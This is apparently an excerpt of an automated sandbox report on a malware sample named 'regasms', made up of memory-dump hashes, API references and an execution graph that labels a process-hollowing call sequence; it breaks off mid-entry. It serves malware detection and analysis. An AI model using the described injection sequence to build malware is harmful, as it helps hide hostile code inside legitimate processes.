                                  • Opcode Fuzzy Hash: 4c891e904437d1ea7e6281008d7860d6edfc9c7852c3130a2e5ae51dbd1feb87
                                  • Instruction Fuzzy Hash: 8AE11CB4E102599FDB14DFA8C580AAEBBF2BF89305F24C169D814AB359C7309D42DF61
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc9e9e7d6ac72dc8849ee40527f53fcadbab2e233eca8e4efc653e76d50b9544
                                  • Instruction ID: e2b0532c1ce5655e6e24ddcb55b064a316d988ad3094c7afd26213b86a4e5499
                                  • Opcode Fuzzy Hash: bc9e9e7d6ac72dc8849ee40527f53fcadbab2e233eca8e4efc653e76d50b9544
                                  • Instruction Fuzzy Hash: 951272F2401F459EE712CF66ED4C28A7BB1BB85318B90460BD2617A2F5DBB8154ECF84
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 850336ede45438136f07d33ff9d79edad724a80a41c8b69b8da97cb96cccf15d
                                  • Instruction ID: 1640ae0204869685858909ff0e46f291981d39c1ef30cbb5aa0049cfc8ef0f7a
                                  • Opcode Fuzzy Hash: 850336ede45438136f07d33ff9d79edad724a80a41c8b69b8da97cb96cccf15d
                                  • Instruction Fuzzy Hash: 17E11AB4E102199FDB14DF99C580AAEFBF2BF89305F24C169D804AB359D7309942DFA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e72717a65ab8f1888069114b1a25b451d40a28ffb05d5cfaf7384c4caec88a38
                                  • Instruction ID: 867025813e8c6640527bce1a6d2b4f76220fbaf407d6decd18d3f37b206da8cf
                                  • Opcode Fuzzy Hash: e72717a65ab8f1888069114b1a25b451d40a28ffb05d5cfaf7384c4caec88a38
                                  • Instruction Fuzzy Hash: 21E11BB4E102199FDB14DFA9C580AAEFBF2BF89301F24C169D404AB356D7349942DFA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db81a57a311e8fed2680cb500446628af00f60a01a77f2368c73289987f3cdb1
                                  • Instruction ID: 0f219de230fe13a07c21af479cd34c94395af6844eec5c628075baad51cc716d
                                  • Opcode Fuzzy Hash: db81a57a311e8fed2680cb500446628af00f60a01a77f2368c73289987f3cdb1
                                  • Instruction Fuzzy Hash: 1BE11CB4E102199FDB14DF98C580AAEFBF2BF49305F24C169D404AB356C7349942DFA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5dddd381b12e8fcaef326e8715a02a7f0878d5dd1699e3adaca968c6c1f07fa
                                  • Instruction ID: ec23f05e77d9b3f39824f994770c77a669cdb8b1095d2804743b20dc0eea3f71
                                  • Opcode Fuzzy Hash: b5dddd381b12e8fcaef326e8715a02a7f0878d5dd1699e3adaca968c6c1f07fa
                                  • Instruction Fuzzy Hash: F5E129B4E102199FDB14DF98C580AAEFBF2BF49305F24C169D814AB35ACB349942DF61
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f8e52d9ec549d73797604fecf295828040f907650e9e7c6ba0e755ef8b80a63
                                  • Instruction ID: b3a7d50e91afff1190ed2e32f99cc4e49553c4f09828da4344986f8fb06bfe59
                                  • Opcode Fuzzy Hash: 7f8e52d9ec549d73797604fecf295828040f907650e9e7c6ba0e755ef8b80a63
                                  • Instruction Fuzzy Hash: 21A15D32E002099FCF09DFB5D9445DEB7B2FF85300B15857AE805AB265EB31E996CB80
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1408845617.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_5850000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d9e5bab42a1f91fe02b22abf327cb4b9e9104dd7f2f4c17b15169cd38b1f47e
                                  • Instruction ID: f3cc437f94e305395ce444cd80ad31cb5df8887580d8d94d25e651b498dc9835
                                  • Opcode Fuzzy Hash: 3d9e5bab42a1f91fe02b22abf327cb4b9e9104dd7f2f4c17b15169cd38b1f47e
                                  • Instruction Fuzzy Hash: 7BC1E8B2801B458FD712CF6AEC4828A7BB1BB85324F55460BD2617B2F4DBB4558ECF84
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c08a9cc9298897dd7ca4226aa69e9dad90268e8fa35993ccd69c2f90ef29532e
                                  • Instruction ID: 9b3577d700750508d9725b9307eacbfe4a53a852a3ecc41c86ef8f93db1e3c32
                                  • Opcode Fuzzy Hash: c08a9cc9298897dd7ca4226aa69e9dad90268e8fa35993ccd69c2f90ef29532e
                                  • Instruction Fuzzy Hash: E9512CB4E102199FDB14CFA9C9805AEFBF2EF89301F24C169D418AB215D7309942DFA1

                                  Execution Graph

                                  Execution Coverage:9.7%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:173
                                  Total number of Limit Nodes:4
                                  execution_graph (rendered call graph not reproduced; API-bearing nodes recovered from the graph data)
                                  • 2f84668 -> 2f84778 -> 2f84888 / 2f84878 -> 2f844b4 -> 2f85918: CreateActCtxA
                                  • 2f8b218 -> 2f8b300 -> 2f8b548: GetModuleHandleW
                                  • 2f8d7c8: DuplicateHandle
                                  • 2f8d580: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                  • 7dd60ff and 7dd61d5 -> 7dd7f80 / 7dd7f84 (12 API calls each) -> wrapper nodes 7dd8379, 7dd83af, 7dd83e1, 7dd84cd, 7dd8501, 7dd855c, 7dd8584, 7dd85a2, 7dd866c, 7dd8803, 7dd8886, 7dd888c, 7dd88e7, 7dd89cf, 7dd89f6, 7dd8b17 (2 API calls each) -> thunks: CreateProcessA (7dd5cdc, 7dd5ce8), VirtualAllocEx (7dd5998, 7dd59a0), WriteProcessMemory (7dd5a59, 7dd5a60), ReadProcessMemory (7dd5b48, 7dd5b50), Wow64SetThreadContext (7dd58c8, 7dd58c0), ResumeThread (7dd5818, 7dd5811); this is the process-hollowing API sequence
                                  • 7b177c8 -> 7dd9068 -> 7dd26d4 -> 7dd9320: PostMessageW

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 2f8d570-2f8d74d
                                  • API calls in blocks: GetCurrentProcess (2f8d585), GetCurrentThread (2f8d618), GetCurrentProcess (2f8d655), GetCurrentThreadId (2f8d6b3); internal call to 2f8d75a (2f8d692)
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D5FE
                                  • GetCurrentThread.KERNEL32 ref: 02F8D63B
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D678
                                  • GetCurrentThreadId.KERNEL32 ref: 02F8D6D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 01b46fff131daa781729997962046e985545077ac05969364d6a115a37263e3e
                                  • Instruction ID: d7ce1b3f2bda852aedd94c53f83c00b27f3c438c33ba48e2167e08a5e97b0048
                                  • Opcode Fuzzy Hash: 01b46fff131daa781729997962046e985545077ac05969364d6a115a37263e3e
                                  • Instruction Fuzzy Hash: 605144B0D00249CFEB15DFA9D648BAEFBF1EF48344F24845AE109AB2A1D7345944CB66

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 2f8d580-2f8d74d
                                  • API calls in blocks: GetCurrentProcess (2f8d580), GetCurrentThread (2f8d618), GetCurrentProcess (2f8d655), GetCurrentThreadId (2f8d6b3); internal call to 2f8d75a (2f8d692)
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D5FE
                                  • GetCurrentThread.KERNEL32 ref: 02F8D63B
                                  • GetCurrentProcess.KERNEL32 ref: 02F8D678
                                  • GetCurrentThreadId.KERNEL32 ref: 02F8D6D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 705302f63920e26bc3aedb7e04f7345bd7e4eb2b918a107a280fa09b549433fc
                                  • Instruction ID: b351924f85884c3a0b71bd2d3f9a9373034321f79224a3783587a3b88e55b1f5
                                  • Opcode Fuzzy Hash: 705302f63920e26bc3aedb7e04f7345bd7e4eb2b918a107a280fa09b549433fc
                                  • Instruction Fuzzy Hash: 8D5122B0D00209CFEB14DFA9D648BAEFBF1EF48344F248459E119AB2A0D7745944CB66

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7b16c81-7b17351
                                  • No Windows API calls in blocks; internal call to 7b16e88 (7b1733e)
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'q$F$R$pq
                                  • API String ID: 0-188756743
                                  • Opcode ID: 57380d2770aea1c99ca2a2cc0c7fbeda7c9eb635e4c416cb698229701acb0aea
                                  • Instruction ID: f92af3ee6026dd4228aeab5206852f296d06331974df0c74623c706495e609a0
                                  • Opcode Fuzzy Hash: 57380d2770aea1c99ca2a2cc0c7fbeda7c9eb635e4c416cb698229701acb0aea
                                  • Instruction Fuzzy Hash: E6D1E6B6600104EFDB16CF99C984D59BBB2FF49314B5A80E9E6099F272CB32DC61DB50

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7b19260-7b193ae
                                  • No API or internal calls in blocks
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q$8q
                                  • API String ID: 0-3169173723
                                  • Opcode ID: 715585cb1cb576f659a42a692c83a2e8b46082f9cadec658e693d29973a0c34c
                                  • Instruction ID: b0adea6fa72d499c08c26fce07b1e1b56bc1c63e5f2ca372682b28086ab8a399
                                  • Opcode Fuzzy Hash: 715585cb1cb576f659a42a692c83a2e8b46082f9cadec658e693d29973a0c34c
                                  • Instruction Fuzzy Hash: 1531C7F4E142C6DFFB049A94D46557E76B2EBCA200F9040EAD503E73C4DA31AD0287E2

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7b1837f-7b18587
                                  • No API or internal calls in blocks
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q$$q
                                  • API String ID: 0-3275118826
                                  • Opcode ID: 59695c975cd8f843615a2895e2eadb823130be0c49443f51b7693839f2e18717
                                  • Instruction ID: fc34f4dfcf5cca73a9ef2fae2e52abaf1cf9b0c1082c7348bc4edd369a4d68c6
                                  • Opcode Fuzzy Hash: 59695c975cd8f843615a2895e2eadb823130be0c49443f51b7693839f2e18717
                                  • Instruction Fuzzy Hash: 8EF0B4F0A1420ADFFB744B69A8353BA3671FB15311F4C84B7E903AF243DA24840287A2

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7b12aa5-7b12d81 (entry 7b12ac7)
                                  • No Windows API calls in blocks; internal calls to 7b120d8 (7b12b55), 7b122f0 (7b12b86), 7b116cc (7b12ba0, 7b12bca), 7b12418 (7b12bb4)
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q$Hq
                                  • API String ID: 0-1154169777
                                  • Opcode ID: 012ebe7227f8cc7ca5a92d959cdbc07e3a97937d79ffe0a594ea48d577018001
                                  • Instruction ID: d5e295e805c3f5e41af46848fe2fe040c46da6c909087546675f4479b20af756
                                  • Opcode Fuzzy Hash: 012ebe7227f8cc7ca5a92d959cdbc07e3a97937d79ffe0a594ea48d577018001
                                  • Instruction Fuzzy Hash: 6871BDB1B002198FEB15DF69D9097EEBBF6FB88210F54846AE505E7340DB389C05CBA5

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7b19250-7b193ae
                                  • No API or internal calls in blocks
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8q$8q
                                  • API String ID: 0-4291441500
                                  • Opcode ID: c6b3ed905a4536d0878e2da74a5c8a0d4a3a0d18c6f07e722c8541496172854b
                                  • Instruction ID: ddecc09905269fa257380c9b05e8636c6bf0211884f0277dd25be4ed93bb5d3b
                                  • Opcode Fuzzy Hash: c6b3ed905a4536d0878e2da74a5c8a0d4a3a0d18c6f07e722c8541496172854b
                                  • Instruction Fuzzy Hash: 7E31C4F4A182C6DFFB049A54D4755BE7BB1EB8B200F9540DBD503EB381D631690287E2

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7b182d0-7b18357
                                  • No Windows API calls in blocks; internal calls to 7b1839f and 7b1837f (7b18335)
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q$$q
                                  • API String ID: 0-3126353813
                                  • Opcode ID: b3e6c90320d8b34b9184384e83e10a26b49b75836aa1e2bdbc41e88ff4f3b2f8
                                  • Instruction ID: bc7ec3ab7ddf76dd05747ade45cd50236381e0e0541d0a51e7b028c4afb412ea
                                  • Opcode Fuzzy Hash: b3e6c90320d8b34b9184384e83e10a26b49b75836aa1e2bdbc41e88ff4f3b2f8
                                  • Instruction Fuzzy Hash: CD01F5F0519282CFE3268724D8143657BB1FB03260F8882EBE84ACB142C7358945C7D6

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7b1839f-7b18587
                                  • No API or internal calls in blocks
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1466750996.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7b10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8$$q
                                  • API String ID: 0-1864139234
                                  • Opcode ID: 3b5a6ec2eb7b6bd2db3575b78d432294ae69a74b2107f81b2ac679c9d7230011
                                  • Instruction ID: 07235160a5fab80dea34a6c82f697e4de402153679f52b8ef6e14568bc5c263f
                                  • Opcode Fuzzy Hash: 3b5a6ec2eb7b6bd2db3575b78d432294ae69a74b2107f81b2ac679c9d7230011
                                  • Instruction Fuzzy Hash: A5F0C8F0750205DBFB208B14DC767A97371FB10714F5C88E2ED06AF682E6A08991C792

                                  Control-flow Graph (rendered basic-block graph not reproduced)
                                  • Function blocks: 7dd5cdc-7dd602d
                                  • API calls in blocks: CreateProcessA (block 7dd5e77-7dd5f31)
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DD5F1E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 7c71fb0cca8e95bbcbfb2e2148f0813ce6ae93272bb85d373a6f58dc44b7be56
                                  • Instruction ID: 166cfa1f18632079263f8afbaf7d72f813a1c0c69ee1bf640f2e8b2f2cab6ecf
                                  • Opcode Fuzzy Hash: 7c71fb0cca8e95bbcbfb2e2148f0813ce6ae93272bb85d373a6f58dc44b7be56
                                  • Instruction Fuzzy Hash: DAA15BB1D00219CFEB14DF68D844BEDFBB2BF48310F14816AE819A7240DB749995CF91
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07DD5F1E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 2e87c8f4bea383fef8c3d238a8586eca8c21b46be19788d0982a252bc7cd5636
                                  • Instruction ID: 57e6e235412fcc1332cc34718a57a743c10b309d66dc748685b15694a930103b
                                  • Opcode Fuzzy Hash: 2e87c8f4bea383fef8c3d238a8586eca8c21b46be19788d0982a252bc7cd5636
                                  • Instruction Fuzzy Hash: 03914BB1D00219CFEB24DF68D844BEDFBB2AF48314F1485AAE819A7240DB749995CF91
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02F8B566
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 9ffe89c2234d8f32be37fdd3a8b99a9886ffe253005311d87e5d9c43263e4cd2
                                  • Instruction ID: 51c38c0881d7ca3de9c8195c69a925d88e2426b77ba005f55425056643a0a4ef
                                  • Opcode Fuzzy Hash: 9ffe89c2234d8f32be37fdd3a8b99a9886ffe253005311d87e5d9c43263e4cd2
                                  • Instruction Fuzzy Hash: 31813370A00B058FDB25DF2AD55579ABBF1FF88248F00892ED186DBB50E735E849CB91
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 02F859C9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: c8219a11ae1c0e5cd8830bb6fb56df641d0247739b5e05d5e3ff002a06ca0257
                                  • Instruction ID: ee39af59e88a8930731c704ca66a6291c561a05f095ba3aa7dc47a713b50eb3a
                                  • Opcode Fuzzy Hash: c8219a11ae1c0e5cd8830bb6fb56df641d0247739b5e05d5e3ff002a06ca0257
                                  • Instruction Fuzzy Hash: 3141DEB1C00719CFEB25DFAAC884BCEBBB5AF49304F60805AE509AB251DB75594ACF50
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 02F859C9
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 7f1c94d1fc881711a067825c36ceb66798f53edb36239e623962abe17c294212
                                  • Instruction ID: 5f5333d91d0b6f23b5c4ff368110e8209f115cfaf2ea5b25bc0c8b8e1d213a25
                                  • Opcode Fuzzy Hash: 7f1c94d1fc881711a067825c36ceb66798f53edb36239e623962abe17c294212
                                  • Instruction Fuzzy Hash: E841E171C0071DCBEB25DFAAC88478EBBB5BF48344F60805AD509AB251D7755949CF90
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DD5AF0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 746ff7373879222b2de0689a2ad0fda0a342c9d29205be791f3eaceb08c8fbc7
                                  • Instruction ID: 1e1225e10d6850c62217fb3413c7dfce6473ba3902dff4a49f545dc0ef5ceb13
                                  • Opcode Fuzzy Hash: 746ff7373879222b2de0689a2ad0fda0a342c9d29205be791f3eaceb08c8fbc7
                                  • Instruction Fuzzy Hash: FB2135B1900359DFDB10CFAAD884BDEBBF4FF48310F10842AE959A7240D778A954CBA4
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07DD5AF0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 9f0088a19a0c0e7eecb54fd2ed7b2ceafa249cf8173389f738304ba4a872f181
                                  • Instruction ID: 700d62c8f7af97bbe1caeb93344fb58c8bd9c58278d0a82f9112c83c0fd15d64
                                  • Opcode Fuzzy Hash: 9f0088a19a0c0e7eecb54fd2ed7b2ceafa249cf8173389f738304ba4a872f181
                                  • Instruction Fuzzy Hash: E82127B59003599FDB10CFAAC981BDEBBF5FF48310F10842AE919A7240D778A954CBA5
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DD5946
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 08943a9228ee2170281c42170ee32b6947b1a112117183152b7d127f94299aa4
                                  • Instruction ID: 2f74aa7688cdf30a57b07ad33e971af4f9042ef820c7cd0bdb824a77ed005b42
                                  • Opcode Fuzzy Hash: 08943a9228ee2170281c42170ee32b6947b1a112117183152b7d127f94299aa4
                                  • Instruction Fuzzy Hash: BF214AB19003098FDB10CFAAC4447EEFBF5EF48220F10842AD559A7280DB789945CFA5
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DD5BD0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: c8087472c75183cf5b8a29c8616cb1498e1ec10e5fd1d4ad0cf78172ad6ada20
                                  • Instruction ID: 59567cff185471953afd9159da0ab67aad1013b7ac5145c91491a5c369c4b53c
                                  • Opcode Fuzzy Hash: c8087472c75183cf5b8a29c8616cb1498e1ec10e5fd1d4ad0cf78172ad6ada20
                                  • Instruction Fuzzy Hash: 6421F4B18003599FDB10DFAAD840BEEFBF5FF48310F10842AE559A7240CB7999558BA5
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F8D84F
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1439131884.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2f80000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: b59ff0bd32b93b59d63ccb08bf82bab7da0cd468e7477631f2bab3e48305a8b3
                                  • Instruction ID: 0ed078aee74d177f9b0d5b908b7acaafa8ac09792b435cee996b99e90ef77ed8
                                  • Opcode Fuzzy Hash: b59ff0bd32b93b59d63ccb08bf82bab7da0cd468e7477631f2bab3e48305a8b3
                                  • Instruction Fuzzy Hash: BD21FFB5D00248EFDB10CFAAD984AEEBBF4EF08310F14805AE958A7650C338A941CF60
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07DD5BD0
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: d729f1c51348b6ded732b4585ce757023861ad79e8ac22ab2656e980fe90532f
                                  • Instruction ID: 320cca5e8f9104044457f908e213902b6f48a32a56562018790d2ca38cb886cb
                                  • Opcode Fuzzy Hash: d729f1c51348b6ded732b4585ce757023861ad79e8ac22ab2656e980fe90532f
                                  • Instruction Fuzzy Hash: 952103B18003499FDB10CFAAD880BEEFBF5FF48310F10842AE919A7240C77999518BA5
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07DD5946
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.1467321264.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_7dd0000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 1dca36bff23c9d7f594af936f8194b01ea0da4727ef455e2767780a9fb33b9d3
                                  • Instruction ID: 33d0f790d58562a0ff46f8f1c1e40bf3686e52fb6fa0b8dce64917b8b6ecd465
                                  • Opcode Fuzzy Hash: 1dca36bff23c9d7f594af936f8194b01ea0da4727ef455e2767780a9fb33b9d3
                                  • Instruction Fuzzy Hash: 122132B1D003098FDB14DFAAC484BEEFBF5EF48220F14842AD559A7240CB78A945CBA5
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02F8D84F
                                  Memory Dump Source
